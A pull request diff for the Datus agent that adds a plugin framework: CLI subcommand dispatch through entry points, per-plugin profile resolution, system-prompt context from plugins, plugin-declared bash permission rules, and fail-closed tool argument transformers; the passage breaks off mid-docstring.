### PR TITLE
[Feature] Add datus-plugin system without removing scheduler-adapter or sql-policy

### DIFF
--- a/ci/harness/coverage-map.yml
+++ b/ci/harness/coverage-map.yml
@@ -25,6 +25,8 @@ docs_coverage_policy:
       reason: Documentation site landing page, not a user-facing flow.
     - path: docs/develop/README.md
       reason: Contributor/development guide, not a product flow.
+    - path: docs/plugin/development.md
+      reason: Contributor/development guide for plugin authors, not a product flow.
     - path: docs/release_notes.md
       reason: Release notes, not a user-facing flow.
     - path: docs/configuration/introduction.md
@@ -892,6 +894,47 @@ flow_groups:
               Local skill discovery, permission filtering, and real-LLM skill execution are covered.
               Marketplace install/update/remove/publish requires the external Town Backend and is
               classified as an external dependency, not a nightly gap.
+          weekly_benchmark:
+            status: not_applicable
+        gaps:
+          - https://github.com/Datus-ai/Datus-agent/issues/910
+
+      - id: extension.plugins
+        title: Datus plugin discovery, dispatch, and agent integration
+        priority: p1
+        quality_sensitive: false
+        docs:
+          - docs/plugin/introduction.md
+        entrypoints:
+          - "CLI: datus <plugin> subcommand dispatch"
+          - Plugin profile resolution and project pins
+          - Plugin-bundled skill discovery
+          - System-prompt injection
+          - Plugin CLI bash permissions
+          - Tool argument transformers
+        contracts:
+          - Installed datus.plugins entry points dispatch before argparse and fall through cleanly when absent.
+          - Active-profile resolution (--profile > project pin > default > sole > empty) stays deterministic.
+          - User permission rules always beat plugin-declared rules; plugin rules never escape their namespace.
+          - Tool argument transformers rewrite or deny matched tool calls fail-closed.
+        coverage:
+          pr_acceptance:
+            status: covered
+            nodeids:
+              - tests/unit_tests/plugins/test_registry.py
+              - tests/unit_tests/cli/test_plugin_dispatch.py
+              - tests/unit_tests/tools/middleware/test_tool_middleware.py
+          merge_queue:
+            status: covered
+            nodeids:
+              - tests/unit_tests/plugins/test_registry.py
+              - tests/unit_tests/cli/test_plugin_dispatch.py
+              - tests/unit_tests/tools/middleware/test_tool_middleware.py
+          nightly:
+            status: gap
+            notes: >
+              No integration test installs a real plugin package end-to-end
+              (entry-point discovery through pip-installed distribution).
           weekly_benchmark:
             status: not_applicable
         gaps:

--- a/conf/agent.yml.example
+++ b/conf/agent.yml.example
@@ -119,6 +119,13 @@ agent:
   #   #     - "docker:*"              # confirm every call (session approval per bucket)
   #   #   classifier:                 # reserved: LLM classifier (not implemented)
   #   #     enabled: false
+  #   #
+  #   # Installed plugins may declare bash rules for their own ``datus <plugin>``
+  #   # namespace (normal/auto only), layered between the profile base and the
+  #   # rules above — a user ``deny`` always beats a plugin ``allow``. A
+  #   # plugin ``ask`` rule can be relaxed per project via the prompt's
+  #   # "allow (project)" choice (or a matching ``bash_allow`` entry in
+  #   # ``.datus/config.yml``): an exact-match grant auto-runs that pattern.
 
 
   nodes:

--- a/datus/agent/node/agentic_node.py
+++ b/datus/agent/node/agentic_node.py
@@ -207,6 +207,11 @@ class AgenticNode(Node):
 
         self.tool_registry = ToolRegistry()
 
+        # Plugin-declared tool argument transformers are applied lazily on the
+        # first ``_compose_hooks`` call, after ``setup_tools`` and any
+        # ``apply_proxy_tools`` rewrites — see ``_ensure_tool_transformers``.
+        self._tool_transformers_applied = False
+
         # Parse node configuration from agent.yml (available to all agentic nodes)
         self.node_config = self._parse_node_config(agent_config, self.get_node_name())
 
@@ -1139,6 +1144,11 @@ class AgenticNode(Node):
         base_prompt = self._inject_runtime_context(base_prompt)
         base_prompt = self._inject_datasource_runtime_context(base_prompt)
 
+        # Inject installed-plugin context (available scheduling/plugin
+        # environments and what they do), grouped with the other "what's
+        # available" context above.
+        base_prompt = self._inject_plugin_context(base_prompt)
+
         # Inject AGENTS.md project context if present in cwd
         agents_md = self._load_agents_md()
         if agents_md:
@@ -1234,6 +1244,31 @@ class AgenticNode(Node):
             return base_prompt
         if section and section.strip():
             base_prompt = base_prompt + "\n\n" + section.strip()
+        return base_prompt
+
+    def _inject_plugin_context(self, base_prompt: str) -> str:
+        """Append self-describing context contributed by installed plugins.
+
+        Each ``datus.plugins`` package may expose a class-level
+        ``system_prompt(profiles)`` returning a markdown block (e.g. the
+        available scheduler environments). datus collects those sections and
+        appends them verbatim — the plugin owns formatting and is responsible
+        for surfacing only non-secret fields. Skipped entirely when the
+        plugin system is disabled (``agent.plugins_enabled: false``).
+        """
+        agent_config = getattr(self, "agent_config", None)
+        if agent_config is None or not getattr(agent_config, "plugins_enabled", True):
+            return base_prompt
+        try:
+            from datus.plugins.registry import plugin_system_prompt_sections
+
+            sections = plugin_system_prompt_sections(agent_config)
+        except Exception as e:
+            logger.warning(f"Failed to inject plugin context: {e}")
+            return base_prompt
+        for section in sections:
+            if section and section.strip():
+                base_prompt = base_prompt + "\n\n" + section.strip()
         return base_prompt
 
     def _inject_response_language(self, base_prompt: str) -> str:
@@ -2129,6 +2164,8 @@ class AgenticNode(Node):
                 global_config=permissions_config,
                 node_overrides={self.get_node_name(): node_permissions} if node_permissions else {},
                 active_profile=active_profile,
+                plugin_bash_rules=getattr(self.agent_config, "plugin_bash_rules", None),
+                project_bash_allows=getattr(self.agent_config, "project_bash_allow", None),
             )
             # Forward existing callback to permission manager
             if self._permission_callback:
@@ -2921,6 +2958,11 @@ class AgenticNode(Node):
             else None
         )
         effective_max_turns = explicit_turns if explicit_turns is not None else self.max_turns
+        # Wrap tools with plugin transformers BEFORE the stream call below
+        # captures ``self.tools``: call arguments evaluate left to right, so
+        # deferring to ``hooks=self._compose_run_hooks(ctx)`` would be one
+        # argument too late and the first run would execute unwrapped tools.
+        self._ensure_tool_transformers()
         self._current_action_history = ctx.action_history_manager
         try:
             async for stream_action in self.model.generate_with_tools_stream(
@@ -3585,6 +3627,59 @@ class AgenticNode(Node):
                 message_args={"config_error": f"Permission hook setup failed for {self.get_node_name()}: {e}"},
             ) from e
 
+    def _ensure_tool_transformers(self) -> None:
+        """Wrap ``self.tools`` with plugin-declared argument transformers, once.
+
+        Invoked lazily from :meth:`_compose_hooks` so wrapping happens after
+        ``setup_tools`` and any ``apply_proxy_tools`` rewrite (proxied tools
+        are skipped — they execute client-side). Idempotent via a flag so a
+        node reused across turns never double-wraps.
+
+        Gated by ``agent.plugins_enabled`` like every other plugin surface.
+        Collection failures are swallowed inside the registry (a broken plugin
+        must not break the agent), but once a plugin *has* declared
+        transformers, a failure to apply them raises: transformers are policy
+        code, and running without them would silently drop enforcement.
+        """
+        # Defensive getattr: test doubles that bypass ``AgenticNode.__init__``
+        # may carry neither the flag nor an agent_config (same rationale as the
+        # ``interaction_broker`` getattr in ``_stream_once``).
+        if getattr(self, "_tool_transformers_applied", False):
+            return
+        if not getattr(getattr(self, "agent_config", None), "plugins_enabled", True):
+            self._tool_transformers_applied = True
+            return
+        from datus.plugins.registry import collect_plugin_tool_transformers
+
+        transformers_by_pattern = collect_plugin_tool_transformers()
+        if not transformers_by_pattern:
+            self._tool_transformers_applied = True
+            return
+        try:
+            from datus.tools.middleware import apply_tool_transformers
+
+            wrapped = apply_tool_transformers(self, transformers_by_pattern)
+            logger.debug(
+                "Applied plugin tool transformers on node '%s': %d tool(s) wrapped",
+                self.get_node_name(),
+                wrapped,
+            )
+            # Only mark applied on success: setting the flag before the
+            # attempt would turn the fail-closed raise below into fail-open
+            # on the next turn (the early return above would skip wrapping
+            # entirely and matched tools would run unenforced).
+            self._tool_transformers_applied = True
+        except Exception as e:
+            # Fail closed: a declared transformer that cannot be applied means
+            # policy enforcement would silently vanish for matched tools.
+            from datus.utils.exceptions import DatusException, ErrorCode
+
+            logger.exception("Failed to apply plugin tool transformers for %s", self.get_node_name())
+            raise DatusException(
+                code=ErrorCode.COMMON_CONFIG_ERROR,
+                message_args={"config_error": f"Tool transformer setup failed for {self.get_node_name()}: {e}"},
+            ) from e
+
     @staticmethod
     def _extract_total_tokens(actions: List[ActionHistory]) -> int:
         """Walk the current root turn and return its assistant token count.
@@ -3656,6 +3751,7 @@ class AgenticNode(Node):
         ``datus/agent/node/token_usage_hook.py``).
         """
         self._ensure_permission_hooks()
+        self._ensure_tool_transformers()
         compact_hook = self._get_or_create_compact_hook()
         token_usage_hook = self._get_or_create_token_usage_hook()
 

--- a/datus/agent/node/chat_agentic_node.py
+++ b/datus/agent/node/chat_agentic_node.py
@@ -229,6 +229,8 @@ class ChatAgenticNode(AgenticNode):
                 global_config=base_config,
                 node_overrides=self._get_node_permission_overrides(),
                 active_profile=getattr(self.agent_config, "active_profile_name", None) or "normal",
+                plugin_bash_rules=getattr(self.agent_config, "plugin_bash_rules", None),
+                project_bash_allows=getattr(self.agent_config, "project_bash_allow", None),
             )
             self.permission_manager.set_permission_callback(self._handle_permission_ask)
 
@@ -272,6 +274,11 @@ class ChatAgenticNode(AgenticNode):
             self.tools.extend(self.ask_user_tool.available_tools())
         # Plan-mode tools (confirm_plan + todo_*) for main agents; no-op for sub-agents.
         self._register_plan_mode_tools()
+        # The rebuilt list holds fresh, unwrapped FunctionTool instances —
+        # force plugin tool transformers to re-apply on the next hook
+        # composition or the policy wrappers silently vanish mid-session
+        # (e.g. after a task-database switch).
+        self._tool_transformers_applied = False
 
     def _update_database_connection(self, database_name: str):
         """Rebuild the DB tool bound to ``database_name`` and remember it as the active database.

--- a/datus/cli/main.py
+++ b/datus/cli/main.py
@@ -556,6 +556,175 @@ class Application:
         run_web_interface(args)
 
 
+# Subcommand tokens owned by built-in handlers in ``main()``. An installed
+# adapter must never shadow these via the ``datus.cli_commands`` entry-point
+# group. Kept in one place so the reserved set is easy to extend.
+_RESERVED_SUBCOMMANDS = frozenset({"upgrade", "skill"})
+
+
+def _coerce_exit_code(rc: object, name: str) -> int:
+    """Map a handler's return value onto a process exit code.
+
+    The documented contract is ``int | None`` (``None`` meaning success), but
+    legacy handlers cannot be assumed compliant — a non-int return after an
+    otherwise successful run must not crash the CLI. ``True``/``False`` map to
+    success/failure (``int(True)`` would read success as exit code 1).
+    """
+    if rc is None or rc is True:
+        return 0
+    if rc is False:
+        return 1
+    if isinstance(rc, int):
+        return rc
+    logger.warning("Command '%s' returned non-int %r; treating as success.", name, rc)
+    return 0
+
+
+def _dispatch_external_command(argv: "list[str]") -> "int | None":
+    """Dispatch ``datus <name> ...`` to a ``datus.cli_commands`` entry point.
+
+    Adapter packages register a console handler under the
+    ``datus.cli_commands`` group — ``hello = datus_hello.cli:main`` — so
+    installing the adapter adds a ``datus hello ...`` subcommand without any
+    change to datus-agent.
+
+    Runs before argparse (the main parser declares only optional flags, so an
+    unknown positional would otherwise error out). Returns the handler's exit
+    code, or ``None`` when no entry point matches so the caller falls through to
+    the REPL / argparse path. The handler contract is ``main(argv: list[str]) ->
+    int | None``; it receives the arguments *after* the subcommand name.
+    """
+    import sys
+
+    if not argv or argv[0].startswith("-") or argv[0] in _RESERVED_SUBCOMMANDS:
+        return None
+
+    name = argv[0]
+    from datus.plugins.registry import entry_points_for_group
+
+    candidates = entry_points_for_group("datus.cli_commands", name=name)
+    if not candidates:
+        return None
+    if len(candidates) > 1:
+        logger.warning("Multiple datus.cli_commands entry points named %r; using the first.", name)
+
+    try:
+        handler = candidates[0].load()
+    except Exception as exc:  # noqa: BLE001 - a broken adapter must not crash the CLI
+        logger.error("Failed to load '%s' command from adapter: %s", name, exc)
+        return 1
+
+    try:
+        rc = handler(argv[1:])
+    except Exception as exc:  # noqa: BLE001 - a broken adapter must not crash the CLI
+        logger.error("Adapter command '%s' failed: %s", name, exc)
+        print(f"datus {name}: {exc}", file=sys.stderr)
+        return 1
+    return _coerce_exit_code(rc, name)
+
+
+def _split_plugin_globals(args: "list[str]") -> "tuple[str | None, str | None, list[str]]":
+    """Consume leading datus globals ``--profile`` / ``--config`` for a plugin.
+
+    Only options appearing *before* the first non-option token are treated as
+    datus globals; everything from the first command token onward belongs to
+    the plugin. Returns ``(profile, config, remaining_args)``.
+
+    The permission layer mirrors the ``--profile`` part of this stripping
+    (``bash_rules._normalize_datus_plugin_argv``) so plugin-declared rules
+    match profile-qualified invocations — keep the two in sync.
+    """
+    profile: "str | None" = None
+    config: "str | None" = None
+    i = 0
+    n = len(args)
+    while i < n:
+        tok = args[i]
+        if tok in ("--profile", "--config"):
+            if i + 1 >= n:
+                # Missing value — hand the token back to the plugin unchanged.
+                break
+            value = args[i + 1]
+            if tok == "--profile":
+                profile = value
+            else:
+                config = value
+            i += 2
+            continue
+        if tok.startswith("--profile="):
+            profile = tok.split("=", 1)[1]
+            i += 1
+            continue
+        if tok.startswith("--config="):
+            config = tok.split("=", 1)[1]
+            i += 1
+            continue
+        break
+    return profile, config, args[i:]
+
+
+def _dispatch_plugin_command(argv: "list[str]") -> "int | None":
+    """Dispatch ``datus <plugin> ...`` to a ``datus.plugins`` entry point.
+
+    A plugin package registers a plugin class under the ``datus.plugins`` group
+    (``hello = datus_hello.plugin:HelloPlugin``). datus strips
+    its own leading ``--profile`` / ``--config`` globals, resolves the active
+    profile from ``agent.plugins.<name>.<profile>`` (env-expanded), constructs
+    the plugin with that profile, and calls ``run_cli`` with the rest.
+
+    Runs before :func:`_dispatch_external_command` (the legacy
+    ``datus.cli_commands`` path). Returns the plugin's exit code, or ``None``
+    when no plugin claims the token so the caller falls through.
+    """
+    import sys
+
+    if not argv or argv[0].startswith("-") or argv[0] in _RESERVED_SUBCOMMANDS:
+        return None
+
+    name = argv[0]
+    from datus.plugins.registry import load_plugin_class, plugin_entry_point_exists
+
+    # Metadata-only probe: with ``plugins_enabled: false`` the plugin package
+    # must not even be imported, so the master switch is checked before
+    # ``load_plugin_class`` (whose ``ep.load()`` runs module-level code).
+    if not plugin_entry_point_exists(name):
+        return None
+
+    profile_name, config_path, rest = _split_plugin_globals(argv[1:])
+
+    try:
+        from datus.configuration.agent_config_loader import load_agent_config
+
+        kwargs = {"config": config_path} if config_path else {}
+        agent_config = load_agent_config(**kwargs)
+        if not getattr(agent_config, "plugins_enabled", True):
+            print(
+                f"datus {name}: plugins are disabled (`agent.plugins_enabled: false`)",
+                file=sys.stderr,
+            )
+            return 3
+        profile = agent_config.get_plugin_profile(name, profile_name)
+    except Exception as exc:  # noqa: BLE001 - surface a clean error, do not crash
+        logger.error("Failed to resolve config for plugin '%s': %s", name, exc)
+        print(f"datus {name}: {exc}", file=sys.stderr)
+        return 3
+
+    plugin_cls = load_plugin_class(name)
+    if plugin_cls is None:
+        # Entry point exists but the package is broken; fall through so a
+        # same-named ``datus.cli_commands`` handler still gets its chance.
+        return None
+
+    try:
+        plugin = plugin_cls(profile=profile)
+        rc = plugin.run_cli(rest)
+    except Exception as exc:  # noqa: BLE001 - a broken plugin must not crash the CLI
+        logger.error("Plugin '%s' failed: %s", name, exc)
+        print(f"datus {name}: {exc}", file=sys.stderr)
+        return 1
+    return _coerce_exit_code(rc, name)
+
+
 def main():
     """Entry point for console scripts"""
     import signal
@@ -580,6 +749,18 @@ def main():
         from datus.cli.skill_cli import run_skill_command
 
         sys.exit(run_skill_command(args))
+
+    # Intercept plugin subcommands (``datus hello ...``) registered under the
+    # ``datus.plugins`` entry-point group, then legacy adapter subcommands under
+    # ``datus.cli_commands`` (``datus mwaa ...``). Plugins win when both claim a
+    # name. Falls through to the REPL when nothing claims the token.
+    if len(sys.argv) > 1 and not sys.argv[1].startswith("-") and sys.argv[1] not in _RESERVED_SUBCOMMANDS:
+        configure_logging(False, console_output=False)
+        rc = _dispatch_plugin_command(sys.argv[1:])
+        if rc is None:
+            rc = _dispatch_external_command(sys.argv[1:])
+        if rc is not None:
+            sys.exit(rc)
 
     app = Application()
     try:

--- a/datus/cli/repl.py
+++ b/datus/cli/repl.py
@@ -2038,8 +2038,9 @@ class DatusCLI:
         # change both.
         raw_permissions = getattr(self.agent_config, "_raw_permissions", {}) or {}
         raw_user = {k: v for k, v in raw_permissions.items() if k != "profile"}
+        plugin_rules_map = getattr(self.agent_config, "plugin_bash_rules", {}) or {}
         try:
-            new_effective = build_effective_config(choice, raw_user)
+            new_effective = build_effective_config(choice, raw_user, plugin_bash_rules=plugin_rules_map.get(choice))
         except Exception as e:
             # Mirror startup: if ``permissions.rules`` can't be parsed, refuse
             # to install a permissive profile base that would silently drop

--- a/datus/configuration/agent_config.py
+++ b/datus/configuration/agent_config.py
@@ -772,6 +772,13 @@ class AgentConfig:
         self._active_dashboard: Optional[str] = kwargs.get("active_dashboard") or None
         self._active_scheduler: Optional[str] = kwargs.get("active_scheduler") or None
         self._active_semantic: Optional[str] = kwargs.get("active_semantic") or None
+        # Project-level active plugin profile pins forwarded by
+        # ``_apply_project_override`` from ``./.datus/config.yml`` ``plugins:``.
+        # Maps a plugin name to the profile ``datus <plugin>`` should use when
+        # ``--profile`` is omitted. Empty means "no project pin" — profile
+        # resolution then falls back to the ``default: true`` flag / sole entry.
+        _active_plugins_raw = kwargs.get("active_plugins")
+        self._active_plugins: Dict[str, str] = _active_plugins_raw if isinstance(_active_plugins_raw, dict) else {}
         self._runtime_db_context: Dict[str, str] = {}
         # Shared lazily-loaded ``conf/providers.yml`` catalog (metadata only:
         # default_model, base_url, api_key_env, type, model_overrides). Kept
@@ -815,6 +822,26 @@ class AgentConfig:
         self.scheduler_services = {}
         self.scheduler_config: Dict[str, Any] = {}
         self.semantic_layer_configs = {}
+        # ``plugins_enabled`` is the master switch for the datus-plugin
+        # system. When ``False`` no plugin functionality is active: ``datus
+        # <plugin>`` dispatch is refused, plugin-bundled skills are not
+        # discovered, and no plugin context is injected into system prompts.
+        # Intended for API/web deployments where the agent must not be guided
+        # to edit configuration files.
+        self.plugins_enabled = _coerce_bool(kwargs.get("plugins_enabled"), True)
+        # Plugin config: plugin name -> profile name -> profile config dict.
+        # Populated from ``agent.plugins`` by ``init_plugin_services``.
+        self.plugin_services: Dict[str, Dict[str, Dict[str, Any]]] = {}
+        # Raw project-scope bash grants (``.datus/config.yml`` bash_allow),
+        # forwarded by ``_apply_project_override``. Passed to
+        # PermissionManager as an exact-match grant set so a project grant
+        # can bypass an ask-rule hit (merged allow entries cannot).
+        raw_project_bash_allow = kwargs.get("project_bash_allow")
+        self.project_bash_allow: List[str] = (
+            [p for p in raw_project_bash_allow if isinstance(p, str)]
+            if isinstance(raw_project_bash_allow, list)
+            else []
+        )
 
         for name, raw_config in self.agentic_nodes.items():
             if not _SAFE_NAME_RE.match(name):
@@ -860,6 +887,7 @@ class AgentConfig:
         self.init_semantic_layer(self.services.semantic_layer)
         self.init_dashboard(self.services.bi_platforms)
         self.init_scheduler_services(self.services.schedulers)
+        self.init_plugin_services(kwargs.get("plugins", {}))
 
         # SaaS mode: skip _init_dirs() because callers want only derived paths here,
         # not full local directory / backend initialization.
@@ -1168,10 +1196,28 @@ class AgentConfig:
             logger.warning(f"Invalid profile {requested_profile!r} in agent.yml: {e}. Falling back to 'normal'.")
             self.active_profile_name = "normal"
 
+        # Bash rules declared by installed plugins for their own CLI
+        # namespaces (``datus <plugin> ...``), keyed by profile name. Stored
+        # so PermissionManager can re-apply them across runtime profile
+        # switches. Additive convenience only — collection failure just means
+        # extra ASK prompts, so it must never block config load.
+        self.plugin_bash_rules = {}
+        if getattr(self, "plugins_enabled", True):
+            try:
+                from datus.plugins.registry import collect_plugin_cli_permissions
+
+                self.plugin_bash_rules = collect_plugin_cli_permissions()
+            except Exception as e:
+                logger.warning(f"Plugin CLI permission collection failed: {e}; continuing without plugin rules")
+
         # Remove the ``profile`` key so the helper only sees user overrides.
         user_raw = {k: v for k, v in permissions_raw.items() if k != "profile"}
         try:
-            return build_effective_config(self.active_profile_name, user_raw)
+            return build_effective_config(
+                self.active_profile_name,
+                user_raw,
+                plugin_bash_rules=self.plugin_bash_rules.get(self.active_profile_name),
+            )
         except Exception as e:
             # Fail closed: malformed ``permissions.rules`` almost always means the
             # user was trying to *tighten* an otherwise permissive profile. If
@@ -1352,6 +1398,64 @@ class AgentConfig:
             message=(
                 "Multiple scheduler services are configured in `agent.services.schedulers`, "
                 "set `scheduler_service` on the scheduler node."
+            ),
+        )
+
+    def get_plugin_profile(self, plugin: str, profile: Optional[str] = None) -> Dict[str, Any]:
+        """Resolve the active profile config dict for ``plugin``.
+
+        Resolution order when ``profile`` is not given explicitly:
+        ``--profile`` argument → project pin (``./.datus/config.yml``
+        ``plugins.<plugin>``) → the profile flagged ``default: true`` (more
+        than one is an error) → the sole profile. When the plugin has no
+        ``agent.plugins.<plugin>`` section at all, an empty dict is returned so
+        config-free plugins still run. A plugin with multiple profiles and no
+        way to disambiguate raises, asking the user to pass ``--profile``.
+        """
+        profiles = self.plugin_services.get(plugin) or {}
+
+        if profile:
+            if profile not in profiles:
+                raise DatusException(
+                    ErrorCode.COMMON_CONFIG_ERROR,
+                    message=(f"No profile named `{profile}` for plugin `{plugin}`. Configured: {sorted(profiles)}"),
+                )
+            return profiles[profile]
+
+        if not profiles:
+            return {}
+
+        pinned = self._active_plugins.get(plugin)
+        if pinned:
+            if pinned in profiles:
+                return profiles[pinned]
+            logger.warning(
+                "Project pin plugins.%s=`%s` is not configured under `agent.plugins.%s`; "
+                "falling back to the default profile.",
+                plugin,
+                pinned,
+                plugin,
+            )
+
+        defaults = [name for name, cfg in profiles.items() if isinstance(cfg, dict) and cfg.get("default")]
+        if len(defaults) > 1:
+            raise DatusException(
+                ErrorCode.COMMON_CONFIG_ERROR,
+                message=(
+                    f"Multiple profiles for plugin `{plugin}` are marked `default: true` in "
+                    f"`agent.plugins.{plugin}`. Keep at most one default profile."
+                ),
+            )
+        if defaults:
+            return profiles[defaults[0]]
+        if len(profiles) == 1:
+            return next(iter(profiles.values()))
+
+        raise DatusException(
+            ErrorCode.COMMON_CONFIG_ERROR,
+            message=(
+                f"Multiple profiles configured for plugin `{plugin}` and none marked "
+                f"`default: true`; pass --profile <name>. Configured: {sorted(profiles)}"
             ),
         )
 
@@ -2304,6 +2408,34 @@ class AgentConfig:
 
         default_service = self.default_scheduler_service()
         self.scheduler_config = self.scheduler_services.get(default_service, {}) if default_service else {}
+
+    def init_plugin_services(self, param: Dict[str, Any]):
+        """Parse ``agent.plugins`` into ``self.plugin_services``.
+
+        Shape: ``plugins.<plugin_name>.<profile_name>`` → a config dict. Each
+        profile is ``${VAR}``-expanded up front (mirroring how semantic
+        services are resolved) so a plugin receives fully-resolved
+        values. Malformed entries (non-mapping plugin or profile) are skipped
+        rather than raising — a plugin needs no config at all, and datus must
+        stay startable even when a plugin section is half-written.
+
+        When ``plugins_enabled`` is ``False`` the section is ignored entirely,
+        leaving ``plugin_services`` empty.
+        """
+        self.plugin_services = {}
+        if not self.plugins_enabled or not isinstance(param, dict):
+            return
+        for plugin_name, profiles in param.items():
+            if not isinstance(profiles, dict):
+                continue
+            resolved_profiles: Dict[str, Dict[str, Any]] = {}
+            for profile_name, raw_config in profiles.items():
+                if not isinstance(raw_config, dict):
+                    continue
+                resolved = _resolve_nested_value(raw_config)
+                resolved.setdefault("name", profile_name)
+                resolved_profiles[profile_name] = resolved
+            self.plugin_services[plugin_name] = resolved_profiles
 
     def init_semantic_layer(self, param: Dict[str, Any]):
         if not isinstance(param, dict):

--- a/datus/configuration/agent_config_loader.py
+++ b/datus/configuration/agent_config_loader.py
@@ -343,6 +343,12 @@ def _apply_project_override(agent_raw: Dict[str, Any]) -> None:
         for pattern in override.bash_allow:
             if pattern not in allow:
                 allow.append(pattern)
+        # Also forward the raw grant list: merged allow entries cannot beat
+        # ask rules (deny > ask > allow), so PermissionManager keeps these as
+        # an exact-match grant set that lets a project grant bypass an
+        # ask-rule hit (e.g. a plugin-declared ask persisted via the
+        # "allow (project)" prompt choice).
+        agent_raw["project_bash_allow"] = list(override.bash_allow)
     # ``dashboard`` / ``scheduler`` overrides reach AgentConfig through
     # dedicated kwargs so the project-level pin is consulted between the
     # explicit call-site argument and the global default flag at lookup
@@ -355,6 +361,12 @@ def _apply_project_override(agent_raw: Dict[str, Any]) -> None:
         agent_raw["active_scheduler"] = override.scheduler
     if override.semantic is not None:
         agent_raw["active_semantic"] = override.semantic
+    # ``plugins`` pins the active profile per plugin for ``datus <plugin>``
+    # invocations; forwarded to AgentConfig and consulted by
+    # ``get_plugin_profile`` between the explicit ``--profile`` argument and
+    # the profile ``default: true`` flag.
+    if override.plugins is not None:
+        agent_raw["active_plugins"] = override.plugins
 
 
 _PRE_INIT_OVERRIDE_KEYS = {"home", "project_root", "project_name"}

--- a/datus/configuration/project_config.py
+++ b/datus/configuration/project_config.py
@@ -48,7 +48,7 @@ import json
 import os
 from dataclasses import dataclass
 from pathlib import Path
-from typing import Any, Optional, Union
+from typing import Any, Dict, Optional, Union
 
 import yaml
 
@@ -65,6 +65,7 @@ ALLOWED_KEYS = frozenset(
         "dashboard",
         "scheduler",
         "semantic",
+        "plugins",
         "project_name",
         "language",
         "reasoning_effort",
@@ -105,6 +106,7 @@ class ProjectOverride:
     dashboard: Optional[str] = None
     scheduler: Optional[str] = None
     semantic: Optional[str] = None
+    plugins: Optional[Dict[str, str]] = None
     project_name: Optional[str] = None
     language: Optional[str] = None
     reasoning_effort: Optional[str] = None
@@ -117,6 +119,7 @@ class ProjectOverride:
             and self.dashboard is None
             and self.scheduler is None
             and self.semantic is None
+            and self.plugins is None
             and self.project_name is None
             and self.language is None
             and self.reasoning_effort is None
@@ -193,6 +196,7 @@ def load_project_override(cwd: Optional[str] = None) -> Optional[ProjectOverride
         dashboard=_parse_optional_string(raw.get("dashboard"), key="dashboard"),
         scheduler=_parse_optional_string(raw.get("scheduler"), key="scheduler"),
         semantic=_parse_optional_string(raw.get("semantic"), key="semantic"),
+        plugins=_parse_plugins(raw.get("plugins")),
         project_name=raw.get("project_name"),
         language=raw.get("language"),
         reasoning_effort=_parse_reasoning_effort(raw.get("reasoning_effort")),
@@ -236,6 +240,32 @@ def _parse_optional_string(raw: Any, *, key: str) -> Optional[str]:
         return None
     value = raw.strip()
     return value or None
+
+
+def _parse_plugins(raw: Any) -> Optional[Dict[str, str]]:
+    """Normalize the ``plugins:`` field into a ``{plugin: profile}`` mapping.
+
+    Pins the active profile per plugin for ``datus <plugin>`` invocations when
+    ``--profile`` is omitted. Non-mapping values, and entries whose plugin name
+    or profile is not a non-empty string, are dropped with a warning so a typo
+    fails loudly rather than silently selecting the wrong profile. ``None`` /
+    empty means "no pin".
+    """
+    if raw is None:
+        return None
+    if not isinstance(raw, dict):
+        logger.warning(f"plugins must be a mapping, got {type(raw).__name__}. Ignoring.")
+        return None
+    parsed: Dict[str, str] = {}
+    for plugin, profile in raw.items():
+        if not isinstance(plugin, str) or not plugin.strip():
+            logger.warning(f"plugins key must be a non-empty string, got {plugin!r}. Ignoring.")
+            continue
+        if not isinstance(profile, str) or not profile.strip():
+            logger.warning(f"plugins['{plugin}'] must be a non-empty string profile, got {profile!r}. Ignoring.")
+            continue
+        parsed[plugin.strip()] = profile.strip()
+    return parsed or None
 
 
 def _parse_reasoning_effort(raw: Any) -> Optional[str]:
@@ -290,6 +320,7 @@ def save_project_override(override: ProjectOverride, cwd: Optional[str] = None) 
             "dashboard": override.dashboard,
             "scheduler": override.scheduler,
             "semantic": override.semantic,
+            "plugins": override.plugins,
             "project_name": override.project_name,
             "language": override.language,
             "reasoning_effort": override.reasoning_effort,

--- a/datus/plugins/__init__.py
+++ b/datus/plugins/__init__.py
@@ -1,0 +1,23 @@
+# Copyright 2025-present DatusAI, Inc.
+# Licensed under the Apache License, Version 2.0.
+# See http://www.apache.org/licenses/LICENSE-2.0 for details.
+
+"""datus-plugin framework: discover ``datus.plugins`` CLI + skill contributors."""
+
+from datus.plugins.base import DatusPlugin
+from datus.plugins.registry import (
+    PLUGIN_ENTRY_POINT_GROUP,
+    iter_plugin_entry_points,
+    load_plugin_class,
+    plugin_skill_directories,
+    plugin_system_prompt_sections,
+)
+
+__all__ = [
+    "DatusPlugin",
+    "PLUGIN_ENTRY_POINT_GROUP",
+    "iter_plugin_entry_points",
+    "load_plugin_class",
+    "plugin_skill_directories",
+    "plugin_system_prompt_sections",
+]

--- a/datus/plugins/base.py
+++ b/datus/plugins/base.py
@@ -1,0 +1,114 @@
+# Copyright 2025-present DatusAI, Inc.
+# Licensed under the Apache License, Version 2.0.
+# See http://www.apache.org/licenses/LICENSE-2.0 for details.
+
+"""The datus-plugin contract.
+
+A *plugin* is an installable package that extends datus with a ``datus
+<plugin> ...`` CLI subcommand plus (optionally) a bundled skill directory,
+discovered through the ``datus.plugins`` entry-point group. The entry point
+resolves to a **plugin class** that datus uses purely by structure — a plugin
+package never imports ``datus.*``.
+
+Contract (duck-typed; :class:`DatusPlugin` documents it but is not imported by
+plugins):
+
+* ``PluginClass(profile: dict)`` — datus resolves the active profile from
+  ``agent.plugins.<name>.<profile>`` (env-expanded) and constructs the plugin
+  with it. A config-free plugin may ignore the argument.
+* ``instance.run_cli(argv: list[str]) -> int | None`` — run the subcommand;
+  ``argv`` is everything after ``datus <plugin>`` with datus' own
+  ``--profile`` / ``--config`` already stripped. Return an exit code (``None``
+  is treated as ``0``).
+* ``PluginClass.skills_dir() -> str | None`` — *optional* classmethod/
+  staticmethod/attribute returning the bundled skill directory. Resolved at
+  startup for skill discovery, i.e. **without a profile**, so it must be
+  reachable at the class level and must not depend on ``__init__``.
+* ``PluginClass.system_prompt(profiles: dict[str, dict]) -> str | None`` —
+  *optional* classmethod/staticmethod returning a self-describing markdown
+  block injected into the agent's system prompt (e.g. "Manage scheduled jobs;
+  N environments: ..."). datus passes the plugin's *full* profile mapping
+  (all environments, not just the active one; already ``${VAR}``-expanded) and
+  appends the returned text verbatim. Like ``skills_dir()`` it is resolved at
+  prompt-build time **without a profile instance**, so it must be reachable at
+  the class level. The text enters the LLM context, so the plugin must surface
+  **only non-secret fields** (never ``password`` / secret / access-key values).
+  An installed-but-unconfigured plugin receives ``{}`` — instead of returning
+  ``None`` (and disappearing from the prompt), it should return a short
